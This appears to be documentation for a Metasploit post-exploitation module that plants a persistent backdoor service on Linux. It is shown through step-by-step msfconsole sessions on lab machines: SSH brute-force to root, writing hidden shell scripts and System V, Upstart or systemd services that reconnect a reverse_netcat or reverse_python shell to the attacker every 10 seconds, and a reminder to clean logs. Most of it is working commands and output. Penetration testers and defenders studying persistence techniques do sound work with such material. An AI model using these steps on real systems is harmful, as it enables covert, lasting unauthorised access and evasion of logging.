### Creating A Testing Environment This module has been tested against: 1. Kali 2.0 (System V) 2. Ubuntu 14.04 (Upstart) 3. Ubuntu 16.04 (systemd) 4. Centos 5 (System V) 5. Fedora 18 (systemd) 6. Fedora 20 (systemd) ## Verification Steps 1. Start msfconsole 2. Exploit a box via whatever method 3. Do: `use exploit/linux/local/service_persistence` 4. Do: `set session #` 5. Do: `set verbose true` 6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system. 7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system. 8. Do: `set lhost` 9. Do: `exploit` 10. Do: `use exploit/multi/handler` 11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system. 12. Do: `set lhost` 13. Do: `exploit -j` 14. Kill your shell (if System V, reboot target). Upstart/systemd wait 10sec 15. Get Shell ## Options **target** There are several targets selectable, which all have their own issues. 0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries 1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot). This logs to syslog or /var/log/.log and .err 2. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever. 3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever. **SHELLPATH** If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin **SERVICE** The name of the service to create. If not chosen, a 7 character random one is created. **SHELL_NAME** The name of the file to write with our shell. If not chosen, a 5 character random one is created. ## Scenarios ### System V (Centos 5 - root - chkconfig) Get initial access msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 192.168.199.131 rhosts => 192.168.199.131 msf auxiliary(ssh_login) > set username root username => root msf auxiliary(ssh_login) > set password centos password => centos msf auxiliary(ssh_login) > exploit [*] 192.168.199.131:22 SSH - Starting bruteforce [+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux ' [*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Install our callback service (system_v w/ chkconfig). Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services. msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence msf exploit(service_persistence) > set session 1 session => 1 msf exploit(service_persistence) > set verbose true verbose => true msf exploit(service_persistence) > set SHELLPATH /bin SHELLPATH => /bin msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat payload => cmd/unix/reverse_netcat msf exploit(service_persistence) > set lhost 192.168.199.128 lhost => 192.168.199.128 msf exploit(service_persistence) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Writing backdoor to /bin/GUIJc [*] Max line length is 65537 [*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf [*] Utilizing System_V [*] Utilizing chkconfig [*] Writing service: /etc/init.d/HqdezBF [*] Max line length is 65537 [*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf [*] Enabling & starting our service [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400 Reboot the box to prove persistence reboot ^Z Background session 2? [y/N] y msf exploit(service_persistence) > use exploit/multi/handler msf exploit(handler) > set payload cmd/unix/reverse_netcat payload => cmd/unix/reverse_netcat msf exploit(handler) > set lhost 192.168.199.128 lhost => 192.168.199.128 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Starting the payload handler... [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400 ### Upstart (Ubuntu 14.04.4 Server - root) Of note, I allowed Root login via SSH w/ password only to gain easy initial access Get initial access msf auxiliary(ssh_login) > exploit [*] 10.10.60.175:22 SSH - Starting bruteforce [+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux ' [*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Install our callback service (Upstart) msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence msf exploit(service_persistence) > set session 1 session => 1 msf exploit(service_persistence) > set verbose true verbose => true msf exploit(service_persistence) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python msf exploit(service_persistence) > set lhost 10.10.60.168 lhost => 10.10.60.168 msf exploit(service_persistence) > exploit [*] Started reverse handler on 10.10.60.168:4444 [*] Writing backdoor to /usr/local/bin/bmmjv [*] Max line length is 65537 [*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf [*] Utilizing Upstart [*] Writing /etc/init/Hipnufl.conf [*] Max line length is 65537 [*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf [*] Starting service [*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log [*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400 And now, we can kill the callback shell from our previous session ^Z Background session 5? [y/N] y msf exploit(service_persistence) > sessions -i 1 [*] Starting interaction with 1... netstat -antp | grep 4444 tcp 0 0 10.10.60.175:44368 10.10.60.168:4444 ESTABLISHED 1783/bash tcp 0 0 10.10.60.175:44370 10.10.60.168:4444 ESTABLISHED 1789/python kill 1783 [*] 10.10.60.175 - Command shell session 5 closed. Reason: Died from EOFError kill 1789 Now with a multi handler, we can catch Upstart restarting the process every 10sec msf > use exploit/multi/handler msf exploit(handler) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python msf exploit(handler) > set lhost 10.10.60.168 lhost => 10.10.60.168 msf exploit(handler) > exploit [*] Started reverse handler on 10.10.60.168:4444 [*] Starting the payload handler... [*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400 ### systemd (Ubuntu 16.04 Server - root) Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works. While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode. Get initial access msf exploit(handler) > use exploit/linux/local/service_persistence msf exploit(service_persistence) > set session 1 session => 1 msf exploit(service_persistence) > set verbose true verbose => true msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat payload => cmd/unix/reverse_netcat msf exploit(service_persistence) > set lhost 192.168.199.128 lhost => 192.168.199.128 msf exploit(service_persistence) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Writing backdoor to /usr/local/bin/JSRCF [*] Max line length is 65537 [*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf [*] Utilizing systemd [*] /lib/systemd/system/YelHpCx.service [*] Max line length is 65537 [*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf [*] Enabling service [*] Starting service [*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400 ^Z Background session 7? [y/N] y Kill the process on the Ubuntu target box via local access #good_admin root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444 tcp 0 0 192.168.199.130:47052 192.168.199.128:4444 ESTABLISHED 5632/nc root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632 And logically, we lose our shell [*] 192.168.199.130 - Command shell session 7 closed. Reason: Died from EOFError Now with a multi handler, we can catch systemd restarting the process every 10sec msf exploit(service_persistence) > use exploit/multi/handler msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.199.128 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Starting the payload handler... [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400